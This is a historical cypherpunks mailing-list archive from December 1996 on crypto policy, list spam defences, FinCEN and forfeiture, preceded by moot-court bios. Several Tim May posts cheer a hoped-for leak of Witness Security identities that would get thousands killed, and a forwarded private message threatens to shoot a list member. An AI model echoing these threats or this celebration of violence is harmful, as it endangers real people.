S.A.I.C. Corporation, headquartered in Reston, Virginia, specializing in
computer security matters. Mr. Jackowski became an AUSA in 1984, and
concentrated in prosecuting very complex narcotic importation organizations.
He tried the BCCI case, a six month trial which took place in Tampa in 1990.
He also indicted Panama's General Noriega. He is currently with the
Independent Counsel's Office investigating HUD Secretary Henry Cisneros.

Representing the defendant were two prominent attorneys in the area of cyber
liberties, Andrew Good (agood@world.std.com / (617) 523-5933) and Phil
Dubois (dubois@dubois.com / (303) 444-3885). Andrew Good of Silverglate &
Good specializes in criminal defense and civil liberties law. He is
currently a member of the ABA Task Force on Technology and Law Enforcement,
and was co-counsel for David LaMacchia and for Steve Jackson Games, Inc. Mr.
Dubois is a solo practitioner in Denver Colorado; among his clients is Phil
Zimmermann, author of PGP.

The panel judging the arguments was comprised of federal appellate and
district court judges:

   * The Honorable Sandra Lynch serves on the United States Court of Appeals
     for the First Circuit, and sits in Boston, Massachusetts. She was
     appointed to the bench by President Clinton.

   * The Honorable Susan Bucklew is a United States District Court Judge for
     the Middle District of Florida, sitting in Tampa. She was appointed to
     the bench in 1994 after having served a Circuit Court Judge for the
     State of Florida.

   * The Honorable William J. Castagna is a Senior District Court Judge U.S.
     District Court Judge for the Middle District of Florida, sitting in
     Tampa. He was appointed ot the bench in 1979.

   * The Honorable Nancy Gertner is a United States District Judge for the
     District of Massachusetts, in Boston, Massachusetts. She was appointed
     by President Clinton.

   * The Honorable William C. Younga is United States District Judge for the
     District of Massachusetts, in Boston, Massachusetts. He also serves as
     an adjunct professor at Harvard Law School.

A second panel, made up of regional law school professors, served as a
shadow court and rendered a judgment on the case.

   * Judith McMorrow (McMorrow@hermes.bc.edu) is Associate Professor of Law
     at Boston College. She has served as a law clerk for the former Chief
     Judge of the United States Supreme Court, Warren Burger. She earned her
     J.D. from the University of Notre Dame Law School, and has a B.A. from
     Kalamazoo University.

   * Maureen O'Rourke (MO1@acs.bu.edu) is Associate Professor of Law at
     Boston University. She holds Bachelors' degree in accounting and
     computer science from Marist College, and a J.D. from Yale Law School.

   * Charles Nesson is Professor of Law at Harvard Law School. Contact:
     nesson@hulaw1.harvard.edu / 617 495-4609

   * The shadow court rendered a Majority Opinion and a Concurring Opinion.

Michael Froomkin (Appeals Court Majority Opinion) is an Associate Professor
of Law at the University of Miami, in Florida, a position he has held since
1992. He has served as a law clerk for both the Hon. Steven F. Williams of
the U.S. Court of Appeals for the D.C. Circuit, and Chief Judge John F.
Grady, of the U.S. District Court for the Northern District of Illinois. He
earned his law degree from Yale University, holds a M.Phil. degree from
Cambridge University, and earned a B.A. from Yale with a double major of
economics and history. Among his recent writings is, "The Metaphor is the
Key: Cryptography, the Clipper Chip and the Constitution", which was
published in 1995 in the University of Pennsylvania Law Review. Contact:
Froomkin@law.miami.edu / (305) 284-4285

Christine Axsmith (Appeals Court Dissenting Opinion) is a Computer Security
Consultant with the Orkand Corporation, in Washington, D.C., and is
currently assigned to the Office of Consular Affairs of the United States
State Department. She received her J.D. from Catholic University, and holds
a B.S. Degree in Computer Science from Drexel University. Contact:
axsmith@dockmaster.ncsc.mil

Alysssa Harvey (Bench memo) is a student at Georgetown University Law
School.

Jeffrey Hermes and Chris Kelly (Brief for the Appellant) are students at
Harvard Law School.

The brief for the Government was prepared by Bob Kluge and Dan Zelenko
(American Univeristy School of Law) and Scott Faga (George Mason University
School of Law).

Andrew Grosso (Organizer) is currently in private practice in Washington,
D.C. From 1983 to 1994, he served as an Assistant U.S. Attorney in Tampa,
Florida, and Boston, Massachusetts. He earned his J.D. from the University
of Notre Dame Law School, and holds M.S. degrees from Rensselaer Polytechnic
Institute in both physics and computer science. Contact: agrosso@acm.org /
(202) 663-9041





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 10:25:52 -0800 (PST)
To: Bill Frantz <cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b00aeef066ecc51@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 12/30/1996, Bill Frantz wrote:
> The Christmas attack against this list shows the need to develop lists
> which are resistant to attacks.  If cyberspace is to become the town square
> of the next century, we need to be able to discourage brown shirts attacks
> on political gatherings.  If lists are to be a major part of the political
> life of the community, then they must be resistant to attacks from
> knowledgeable, well financed attackers, not just the shits who were the
> most recent perps.

> [Fine posting token proposal deleted.]

The easiest and fastest solution is to set up toad.com to charge a
dollar per message.  (Proceeds to be spent by John Gilmore as he
sees fit.)

We can then leverage off the existing e-cash infrastructure which
already provides blinding software for free on all major platforms.

What I like about this scheme is that well-financed attackers will
be welcomed.  A spam attack just means that John can buy more sushi!

(I volunteer to modify majordomo to accept e-cash if there is enough
interest in this proposal.)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 31 Dec 1996 10:26:06 -0800 (PST)
To: Sandy Sandfort <ichudov@algebra.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <v02140b01aeef08c759b8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:04 AM 12/31/1996, Sandy Sandfort wrote:
> There is a simple solution to keeping anonymous posters anonymous
> under this or any similar scheme.  Volunteers could act as
> "gateways" for anonymous posts.  Self-selected list members could
> announce that they would forward anonymous posts using one of
> their own tokens for the purpose.  (In the alternative, the
> gateway volunteers could be given extra tokens solely for that
> purpose.)

Would this expose the posters to liability?  Unlike an anonymous
remailer, they are deciding what to post.

In the case of software, criminal liability result.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 10:24:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: FinCEN, and WitSec are criminal agencies
In-Reply-To: <9612311536.AA11070@cow.net>
Message-ID: <v03007800aeef07e92cfb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to the anonymous poster of this WSJ article, "Obscure Treasury Unit
Helps DEA Uncover Scheme," I've added a name to the thread, which the
remailed post did not have.

At 10:36 AM -0500 12/31/96, Bovine Remailer wrote:

>WSJ, December 30, 1996:  Obscure Treasury Unit Helps DEA Uncover Scheme

>The St. Louis case became a prime example of how Fincen, the nation's
>smallest intelligence agency, brings the latest in high-tech firepower to
>the never-ending battle against money-laundering schemes. The agency,
>created in April 1990, uses a staff of 200 analysts and agents to offer state-
>of-the-art computer tracking and analysis to state and federal agents and
>prosecutors, giving them more time to work the cases from the street.

FinCEN is a very intriguing agency, one which we've talked about several
times on this list. (I first vaguely heard of it in 1990 or '91, but there
was little press about it for a long time. An early issue of "Wired"
carried a comprehensive article on it, sometime late in '93.) FinCEN is a
multi-agency task force sort of thing, located in the Northern Virginia
complex of surveillance agencies, credit reporting agencies (hardly a
coincidence that TRW Credit, Transunion, and Equifax have major offices
within a few miles of FinCEN, the National Reconnaissance Organization,
CIA, etc.), etc.

If you want to know who's likely to be pushing for limits on encryption of
financial transactions, look no further than FinCEN.

>Enter James Petrakis, a graying, 47-year-old Fincen investigator, who flew
>out from Washington. Mr. Petrakis designed a computer program for the case
>that could follow the money as it flowed through companies -- some phony,
>some real -- and through people who transferred ownership of some 30 pieces
>of local real estate that seemed to be involved.

EPIC, the El Paso Information Center, was orginally focussed on DEA types
of narco-surveillance, and developed several programs for sniffing the
aether for evidence that citizen-units were engaging in trade which the CIA
had granted itself a monopoly on.

>Because the business also trafficked in guns, the Treasury Department's
>Bureau of Alcohol, Tax and Firearms was working on the case, too. Robert
>Nosbisch, the top bureau agent, agreed that tracking the money was going to
>be key. "The objective in a case like this is to get anyone who has a
>significant role into jail and take all of their assets," he says.
>                               ^^^^^^^^^^^^^^^^^^^^^^^^
>
>   [What do you do when the highwaymen wear badges?]
>

Civil forfeiture is of course becoming a favored way of stealing assets
without actually having to go to court. In many cases, charges are dropped,
but the assets are not returned....the victim is forced to try to sue to
get the assets back. This is the modern version of governments and kings
issueing "letters of marque and reprisal," i.e., authorizing privateers to
act as "pirates," keeping a cut of what they grab. (Sir Francis Drake being
an historical example.)

>There were other odd things. Although Mr. Jones was 43 (in 1995), his
>credit records and other personal history only went back to 1985. Before
>that,
>he had no records. Mr. Jones's biggest drug moves usually happened on
>government holidays, when the DEA and ATF staffs were slim. Mr. Moore had a
>theory: Mr. Jones was probably a federal informant, a man who had worked with
>federal agents in drug cases before.
>
>   [More like a graduate of the Federal Witness Protection Program, I'd say.
>    Seems odd that they want to ID us down to the last gnat's eyebrow while
>    making up IDs for their buddies.]

Indeed, this is likely. As with the guy who blew away his stock broker in
1987 in Florida...turned out he had been set up with a phony I.D. and
falsified credit history (courtesy of Equifax, Transunion, TRW complicity,
one has to presume) and given a million dollars of spending money. This is
the "Witness Security Program," run by the U.S. Marshall's Service.

Can a person sue WitSec, or TRW Credit, etc., for falsifying such records?

(The credit reporting agencies immediately can spot the "ghosts" who
suddenly pop into existence, as when WitSec clients and spies are given
cover identities...this is a reason for the cozy relationship and the
"classified" status of many credit agency projects. Think about it.)

Someday the records of those 60,000 folks in the WitSec program will be
"liberated" and placed anonymously on the Net for the perusal of their
neighbors, their former Mafia families, and so on. I can't wait. Of course,
about 15,000 of them will likely be killed in short order. I also can't
wait for that.

FinCen, WitSec, etc. are examples of fundamentally criminal agencies, and
the bigwigs in each probably have already earned severe punishment when
their misdeeds become more fully apparent. I don't advocate blowing up
their buildings, a la OKC, but I certainly understand the sentiment.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 31 Dec 1996 07:53:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612311536.AA11070@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Criminal, criminal, who's the criminal...

WSJ, December 30, 1996:  Obscure Treasury Unit Helps DEA Uncover Scheme

>From the beginning, it was The Case That Didn't Add Up. It started with a
woman in St. Louis who wanted to pay Federal Express $38 to ship a package
supposedly containing a $2 paperback book to Los Angeles. The company called 
the local Drug Enforcement Administration office.
  
   [Thanks, FedEx assholes!]

Ralph Moore, a DEA agent, got a search warrant, 

   [Seems like pretty flimsy grounds for a warrant to me.]

opened the package and found $10,000 in cash. 

   [So?]

He checked his records: The woman was on welfare. He searched her house and 
found a new car, $25,000 stuffed into a coat pocket and papers showing the 
woman owned seven buildings.
  
"Follow the money" is supposedly an axiom for federal investigators, but in
November 1994 Mr. Moore was discovering how tough that is to do in drug cases
where suspects are rich and financially savvy. So who was Mr. Moore going to
call? He noticed a DEA memo about an obscure unit of the Treasury Department,
the Financial Crimes Enforcement Network.

   [Dum-da-dum!]  

The St. Louis case became a prime example of how Fincen, the nation's 
smallest intelligence agency, brings the latest in high-tech firepower to 
the never-ending battle against money-laundering schemes. The agency, 
created in April 1990, uses a staff of 200 analysts and agents to offer state-
of-the-art computer tracking and analysis to state and federal agents and 
prosecutors, giving them more time to work the cases from the street.
  
The DEA's Mr. Moore desperately needed the help. The woman who had mailed 
the package had a boyfriend who made $20,000 a year working for an electric 
company. The agent found he had more than 30 different accounts in one bank. 
Bank records showed hundreds of thousands of dollars flowing through them
in patterns that never repeated themselves.
  
Enter James Petrakis, a graying, 47-year-old Fincen investigator, who flew 
out from Washington. Mr. Petrakis designed a computer program for the case 
that could follow the money as it flowed through companies -- some phony, 
some real -- and through people who transferred ownership of some 30 pieces 
of local real estate that seemed to be involved.
  
There were gaps in the digital portrait that emerged, but the general 
outlines were stunning: Mr. Moore had uncovered a family-run drug-
distribution business that appeared to have stashed between $5 million and 
$7 million in various investments and purchases in St. Louis banks.
  
Because the business also trafficked in guns, the Treasury Department's 
Bureau of Alcohol, Tax and Firearms was working on the case, too. Robert 
Nosbisch, the top bureau agent, agreed that tracking the money was going to 
be key. "The objective in a case like this is to get anyone who has a 
significant role into jail and take all of their assets," he says.
                               ^^^^^^^^^^^^^^^^^^^^^^^^

   [What do you do when the highwaymen wear badges?]
  

Mr. Moore's chief suspect, a short, hot-tempered man named William Y. 
Jones, "was too good," he recalls. Mr. Jones had a way of anticipating the 
federal agent's moves. "It was almost like a chess game. As I would move a 
piece, he would move a piece," the agent adds.
  
There were other odd things. Although Mr. Jones was 43 (in 1995), his 
credit records and other personal history only went back to 1985. Before that, 
he had no records. Mr. Jones's biggest drug moves usually happened on 
government holidays, when the DEA and ATF staffs were slim. Mr. Moore had a 
theory: Mr. Jones was probably a federal informant, a man who had worked with 
federal agents in drug cases before.

   [More like a graduate of the Federal Witness Protection Program, I'd say.
    Seems odd that they want to ID us down to the last gnat's eyebrow while
    making up IDs for their buddies.]

  "We needed to become unorthodox," Mr. Moore recalls. When wiretaps led them 
to a $1 million stash of Mr. Jones's cocaine in a car, they seized the drugs 
and the car, too. Later they heard Mr. Jones say on his tapped cellular phone 
that federal agents didn't steal cars. One of his drug partners, Mr. Jones 
concluded, must have double-crossed him.

   [So now they'll just steal stuff from you and not even notify you that
    it has been confiscated.  Amazing!]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt@kdn0.attnet.or.jp (Gemini Thunder)
Date: Tue, 31 Dec 1996 02:44:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regulations
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <32ccea78.74565326@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


gt@kdn0.attnet.or.jp (Gemini Thunder) wrote:

>Has magnetic media never been tested in court for freedom of press
>applicability?  What are the laws that outline the differences between
>magnetic media and printed media?  Specifically, the one(s) that
>permit the non-protection of magnetic media?

I have been thinking on this. 

The government obviously does not want strong crypto in the hands of
 the public.  I see no reason why they will stop at the current
 legislation.

From the present point I can see 2 alternatives:
(1)  The ban on crypto source is extended to printed media.
(2)  The ban on crypto source in magnetic media is tested in court and

struck down as a violation of freedom of press/speech.

I still have enough faith to believe that (1) is unlikely.  
What are the odds on (2)?  (I can't imagine it being upheld)
What are other alternatives?
(I am of the opinon that the "non-OCR-able" font scheme is unlikely.)

Also, what qualifies as "encryption" here?  Basic implementation of 
an algorithm?  Full-blown programs? Hash functions?  Steganography
 (with/without additional encryption)?  Data after a CTRL-Z?  (Sorry,
couldn't help it)  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Tue, 31 Dec 1996 10:49:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: premail.
In-Reply-To: <199612310718.BAA02863@manifold.algebra.com>
Message-ID: <32C95FC7.2461@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:

 [Anonymous's remailer key spoofing attack]

> A good scenario. A truly paranoid premail users should verify who 
> signed the remailer keys.

Unfortunately, in far too many cases, the answer has been "nobody."
This is something I've whined about before.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 10:47:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Extremism in the defense of liberty is no vice
In-Reply-To: <9612302254.AA00731@cow.net>
Message-ID: <v03007801aeef0dff9afe@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 PM -0500 12/30/96, Bovine Remailer (Red Rackham, apparently) wrote:
>At 5:15 PM 12/29/1996, Timothy C. May wrote:

>>It may be time for us to go underground. It may be time to take much, much,
>>much, much more extreme steps. This fascism is unacceptable.
>
>While Tim May has had many many great ideas, this is not one of them.
>
>To paraphrase Joseph Stalin: Tim, how many divisions do you have?

I'd say remailers have been a pretty powerful weapon in our arsenal, as
have been offshore sites, the "anarchy" of the Net in general, and, of
course, PGP and other such programs. The government clearly views strong
cryptography as a weapon, as a munition. More on this later.

>The cypherpunks have virtually no force at all.  If the battle is
>moved to that arena, the cypherpunks (and everybody else) lose big
>time.  If the cypherpunks manage to pull off some sort of "extreme
>step", those who aren't shot while resisting arrest will go to prison.
>Worst of all, most people will applaud the action.  "Extreme steps"
>legitimize the radical proposals of the Clipper crowd.

I gave up on trying to "appear reasonable" long ago. Take it or leave it.

"Extreme step" doesn't mean doing anything that is traceable to a
particular person, and certainly doesn't mean doing militia-type things to
physical buildings or the criminals who work in them.

Rather, pushing for things like violating the ITARs, which we do. (Bill
Frantz noted, tongue in cheek I think, that Cypherpunks do not adovacate
breaking such laws. Well, this is of course absurd. Our whole focus on
steganography, on remailers, on carrying CD-ROMs out of the country, etc.,
is basically advocating various circumventions of USG laws.)

Gilmore's SWAN (getting machine-to-machine links widely encrypted) is
another "extreme step."

As to our "reasonableness," I make little effort to hide the fact that I
support strong cryptography because it means that the plague of democracy
and "mob rule" can be turned back...I view crypto anarchy as an elitist
development, one which the ubermensch will appreciate, but the masses will
recoil in horror from.

Fuck the herd.

>The right approach is to continually reiterate that the cypherpunks
>are mainstream and fairly conservative.  Many of us like the "bad boy"
>image, but most of what has been proposed is very solidly rooted in
>American traditions.

But most of the active voices here are simply *not* "mainstream" and
"conservative" (except in some senses).

>If the ITAR regulations can be amended to make discussions on this
>list a "conspiracy", then they are very likely unconstitutional.
>Article I, Section I, "All legislative powers herein granted shall be
>vested in a congress of the United States..."

Careful, Red! Would it make you happier with the ITARs if Congress passes a
law enacting the regs? It won't make me any happier.

>We should not underestimate the broad public support for private
>communications which exists in the United States.  Even people who are
>unfamiliar with the issue are shocked when they learn that the U.S.
>government is trying to gain access to all communications.

I agree. But there are plenty of forums (fora) for "reasonableness" (some
would say namby-pambyness). EFF is one such "reasonable" forum.

Our focus is more radical. We are effectively a cyber-militia, fulfilling
Jefferson's recommendation that a revolution happen every 20 years.

(Funny, there hasn't been one in more than 200 years. Jefferson would
likely be shocked. And the Founders who revolted over comparatively
miniscule tax rates imposed by the King, would surely be stunned by the 50%
or more in taxes paid by many or even most taxpayers. And the laws of all
sorts.)

>The only people who want GAK are in the government.  There is no
>constituency in the population which wants it, and quite a few that do
>not.  The more publicly the issue is discussed and the more actively
>we scrutinize the lies and deceptions of the U.S. government, the
>more successful we will be.

>Red Rackham

I'll continue to be radical in my views. Nothing wrong with extremism in
the defense of liberty, as some wise men said.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "tmcghan@gill-simpson.com" <tmcghan@gill-simpson.com>
Date: Tue, 31 Dec 1996 08:00:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
Message-ID: <199612311600.LAA21931@mail.bcpl.lib.md.us>
MIME-Version: 1.0
Content-Type: text/plain


Toto wrote:
> {snip} the source of any excessive increase could be put on 'hold'
> until the system operator has a chance to check on the validity
> Bill Frantz wrote:
> > 
> > The Christmas attack against this list shows the need to develop lists
> > which are resistant to attacks.

...and how long has Usenet had 'moderated' newsgroups?

( only as long as there have been individuals with the time and 
patience to screen the volume of input, and exercise thoughtful 
discretion in selecting the 'worthy' postings.)

  How smart an 'automatic' filter can clever folks design?   

for(;;) {
ECM;
ECCM;
}



 
Thomas M. McGhan
tmcghan@gill-simpson.com
http://www.gill-simpson.com
voice:       (410) 467-3335
fax:         (410) 235-6961
pagenet:     (410) 716-1342
cellular:    (410) 241-9113
ICBM:        39.395N 76.469W




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 11:01:08 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Internal Passports
In-Reply-To: <v03007801aeecab7271cd@[207.167.93.63]>
Message-ID: <v03007802aeef121590c5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM -0600 12/31/96, snow wrote:
>Mr. May wrote:
>> My SS card, issued in 1969 (and which I still have, surprisingly enough),
>> says this. Someone said recently here on the list that this line was
>> dropped in more recent years.
>
>     I had to have mine replaced recently, and that line is no longer
>_anywhere_ on the card.
>
>     Did they change the laws regarding the use of your SSN as ID, or
>are most people just ignoring it?
>

At the bottom of my SS card are these exact words:

"FOR SOCIAL SECURITY AND TAX PURPOSES--NOT FOR IDENTIFICATION"

When I had to renew my California Driver's License, I was asked for my SS
number...a new requirement. I pointed out that the SS number is not for
identification. The clerk gave me a blank look and said I would not get a
driver's license without an SS number. I gave in, preferring to fight other
battles.

(And I would surely lose this battle, probably even if I spend tons of
money on mounting a legal challenge.)

There have been several reports cited here recently about changes in the SS
laws to make the SS number more of an ID number. (It already is, of course,
for taxes, for employers, for credit, for driver's licenses, for student
ID, etc.)

And concerns about "identity theft" when such a simple thing as an SS
number is the key to so many records, rights, etc.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Tue, 31 Dec 1996 08:04:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Tim May wants to Kill people!
In-Reply-To: <B5csZD39w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961231105759.31962B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a very sick Tim May who says he would love to
kill this guy with a ">clip of hollowpoints through your chest."


On Tue, 31 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> >Message-Id: <199612310025.QAA11547@adnetsol.adnetsol.com>
> >Comments: Authenticated sender is <rwright@adnetsol.com>
> >From: "Ross Wright" <rwright@adnetsol.com>
> >Organization: King Media and RW Marketing
> >To: cypherpunks@toad.com
> >Date: Mon, 30 Dec 1996 16:33:41 -0800
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset=US-ASCII
> >Content-Transfer-Encoding: 7BIT
> >Subject: (Fwd) Re: Mr. May's Posts.  Other Things.
> >Priority: normal
> >X-Mailer: Pegasus Mail for Win32 (v2.42)
> >Sender: owner-cypherpunks@toad.com
> >Precedence: bulk
> >
> >This is the message I got in response to my post regarding Mr. May's
> >offensive, racist, and bigoted post about ebonics.  I have made
> >overtures towards peace and tried to explain that I thought that the
> >Doctor's verbal slapping was not as bad as it seemed, maybe even he
> >deserved it!.  He refuses to answer.  He's just a pussy, I guess.
> >Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!
> >
> >Maybe the Doctor is not to far from wrong.
> >
> >I would rather have discussed this with you in private e-mail, or
> >over a few beers, but you refuse to answer my e-mail.
> >
> >Received: from you.got.net (root@scir-gotnet.znet.net
> >[207.167.86.126]) by adnetsol.adnetsol.com (8.6.12/8.6.6) with ESMTP
> >id UAA29906 for <rwright@adnetsol.com>; Fri, 27 Dec 1996 20:25:14
> >-0800 Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
> >by you.got.net (8.8.3/8.8.3) with ESMTP id UAA13732 for
> ><rwright@adnetsol.com>; Fri, 27 Dec 1996 20:17:45 -0800 X-Real-To:
> ><rwright@adnetsol.com> X-Sender: tcmay@mail.got.net Message-Id:
> ><v03007800aeea52e5d282@[207.167.93.63]> In-Reply-To:
> ><199612230801.AAA24862@adnetsol.adnetsol.com> Mime-Version: 1.0
> >Content-Type: text/plain; charset="us-ascii" Date: Fri, 27 Dec 1996
> >20:32:00 -0800 To: "Ross Wright" <rwright@adnetsol.com> From: "Timothy
> >C. May" <tcmay@got.net> Subject: Re: Mr. May's Posts.  Other Things.
> >X-PMFLAGS: 35127424 0
> >
> >------- Forwarded Message Follows -------
> >Date:          Fri, 27 Dec 1996 20:32:00 -0800
> >To:            "Ross Wright" <rwright@adnetsol.com>
> >From:          "Timothy C. May" <tcmay@got.net>
> >Subject:       Re: Mr. May's Posts.  Other Things.
> >
> >At 12:09 AM -0800 12/23/96, Ross Wright wrote:
> >
> >>hard on him.  This latest rant of his has made me reconsider your
> >>rough treatment of Mr. May.  I kinda think he deserves a slapping
> >>right now.
> >
> >Go ahead with your "slapping."
> >
> >Of course, I'd treat a "slapping" as an assault. I'd love to put a
> >clip of hollowpoints through your chest.
> >
> >Your place or mine?
> >
> >Just say "No" to "Big Brother Inside"
> >We got computers, we're tapping phone lines, I know that that ain't
> >allowed.
> >---------:---------:---------:---------:---------:---------:---------:
> >---- Timothy C. May              | Crypto Anarchy: encryption, digital
> >money, tcmay@got.net  408-728-0152 | anonymous networks, digital
> >pseudonyms, zero W.A.S.T.E.: Corralitos, CA  | knowledge, reputations,
> >information markets, Higher Power: 2^1398269     | black markets,
> >collapse of governments. "National borders aren't even speed bumps on
> >the information superhighway."
> >
> >
> >
> >
> >
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 31 Dec 1996 11:05:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Unix Passwd
In-Reply-To: <199612261556.HAA05096@slack.lne.com>
Message-ID: <5abo51$d9v@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.95.961226144201.17791B-100000@micro.internexus.net>,
Laszlo Vecsey  <master@internexus.net> wrote:
>From Applied Cryptography (2nd edition) I got the impression that it has
>been cracked. Do a netsearch for "Crypt Breakers Workbench", its a
>freeware program that attempts to do just that.

Please note the difference between crypt(3), the C library call used to
hash passwords, and crypt(1), the user program that encrypts files.  The
former is based on DES, and has not been broken (unless someone from the
NSA wants to speak up now).  The latter is based on the Enigma machine,
and is the one that "Crypt Breakers Workbench" attacks.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMslj2kZRiTErSPb1AQGLyQQAqzq6bWByz48dJq+hnJs+jLCqJQ+1hfI6
zZgURqMYvpFwSq4eIiHr1ukNAKP7Vrr0eHSAFalkPDn1Ii/YueY/SRRE+8oFXIho
C+bJVnXpOBpjitHYpskSuGY4F5FmJrzn8U8vmlhes6viqNq00OmQANoJ0Gr+OUY4
VSHcKXwYMT4=
=Anex
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 31 Dec 1996 08:11:54 -0800 (PST)
To: vipul@pobox.com
Subject: RE: Iranian clergic attacks Internet as 'poison' to the m...
Message-ID: <9611318520.AA852059472@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Subject: RE: Iranian clergic attacks Internet as 'poison' to the masses (

vipul@pobox.com wrote:
>*** Iranian clergic attacks Internet as 'poison' to the masses

>A senior Iranian cleric called Friday for restricting Internet access
>because the global computer network fed "poison" to the masses.

I have seen this article elsewhere, and the sentiment is not as nefarious as it
sounds. You may know that many Arabic and Persian countries have a heavy
exposure to French. In this case, the confusion arises due to the similarity
between the English "poison" and the French "poisson" which means fish.

Restated, the problem is that the Internet is feeding "fish" to the masses in
the form of information, hence the masses are not feeding themselves.

A similar English adage is: Give a man a fish and he'll eat for a day. Teach a
man to fish and he'll eat for the rest of his life.

As the mullah implies, we need to help people to increase their critical
thinking skills, rather than passively accept what others tell them via the
Internet.

Start now.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 31 Dec 1996 08:14:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612310833.CAA03527@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.961231105936.422A-100000@eclipse.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 31 Dec 1996, Igor Chudov @ home wrote:

> Send a number of unique tokens to each subscriber each day.  Enforce a
> rule that only posts with valid current tokens may be accepted. The
> number of tokens should initially be very small (say, one per day) and
> then should be quickly increased to a sufficient number, like 10 or 20,
> as the subscriber shows a record of using tokens properly (as defined by
> acceptable content rules).
> 
> A database is kept as to who was issued which tokens.
> 
> If tokens are used improperly (to post off-topic materials) the 
> offending subscriber is denied any further tokens.
> 
> The problem of this scheme is (besides its cost) that anonymous users
> will not be truly anonymous.

I think this problem can be solved by blind signing the tokens.  A user
generates a random number, multiplies it by the blinding factor, then sending
it to a token server which would append a timestamp and sign the blinded
token.  All signature requests should be signed with a PGP key.  The server
response would be encrypted with the user's public key.  A person's PGP key
would be sent along with the subscription request and then saved by the list
software.

The token would be included in a user's list submission, removed, and saved by
the list software to detect any duplicates.  The server would issue a limited
